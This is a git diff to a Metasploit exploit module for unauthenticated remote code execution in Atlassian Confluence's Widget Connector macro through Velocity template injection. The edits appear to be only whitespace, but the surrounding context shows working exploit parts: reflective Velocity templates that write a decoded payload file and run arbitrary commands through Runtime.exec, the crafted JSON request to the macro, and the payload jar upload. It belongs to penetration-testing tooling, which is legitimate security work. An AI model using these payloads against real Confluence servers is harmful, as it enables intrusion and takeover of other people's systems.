diff --git a/modules/exploits/multi/http/confluence_widget_connector.rb b/modules/exploits/multi/http/confluence_widget_connector.rb index f101ff1073..75e17cdcb5 100644 --- a/modules/exploits/multi/http/confluence_widget_connector.rb +++ b/modules/exploits/multi/http/confluence_widget_connector.rb @@ -16,13 +16,13 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => "Atlassian Confluence Widget Connector Macro Velocity Template Injection", 'Description' => %q{ Widget Connector Macro is part of Atlassian Confluence Server and Data Center that - allows embed online videos, slideshows, photostreams and more directly into page. - A _template parameter can be used to inject remote Java code into a Velocity template, - and gain code execution. Authentication is unrequired to exploit this vulnerability. - By default, Java payload will be used because it is cross-platform, but you can also + allows embed online videos, slideshows, photostreams and more directly into page. + A _template parameter can be used to inject remote Java code into a Velocity template, + and gain code execution. Authentication is unrequired to exploit this vulnerability. + By default, Java payload will be used because it is cross-platform, but you can also specify which native payload you want (Linux or Windows). - Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version + Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected. This vulnerability was originally discovered by Daniil Dmitriev @@ -83,9 +83,9 @@ class MetasploitModule < Msf::Exploit::Remote when /javaprop\.vm$/ conn.put(wrap(get_javaprop_vm())) when /upload\.vm$/ - conn.put(wrap(get_upload_vm())) + conn.put(wrap(get_upload_vm())) when /exec\.vm$/ - conn.put(wrap(get_exec_vm())) + conn.put(wrap(get_exec_vm())) else conn.put(wrap(get_dummy_vm())) end @@ -123,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Remote $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}')) EOF ) - end + end # Returns a command execution template. # @@ -134,7 +134,7 @@ class MetasploitModule < Msf::Exploit::Remote $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor() EOF ) - end + end # Returns checking template. # @@ -166,9 +166,9 @@ class MetasploitModule < Msf::Exploit::Remote <<~EOF EOF ) - end + end - # Checks the vulnerability. + # Checks the vulnerability. # # @return [Array] Check code def check @@ -203,10 +203,10 @@ class MetasploitModule < Msf::Exploit::Remote 'uri' => uri, 'headers' => { 'Accept' => '*/*', - 'Origin' => full_uri(vhost_uri: true) + 'Origin' => full_uri(vhost_uri: true) }, 'ctype' => 'application/json; charset=UTF-8', - 'data' => { + 'data' => { 'contentId' => '1', 'macro' => { 'name' => 'widget', @@ -332,7 +332,7 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Unable to get the temp path.') end - @fname = normalize_payload_fname(tmp_path, "#{Rex::Text.rand_text_alpha(5)}.jar") + @fname = normalize_payload_fname(tmp_path, "#{Rex::Text.rand_text_alpha(5)}.jar") @b64 = Rex::Text.encode_base64(payload.encoded_jar) @command = ''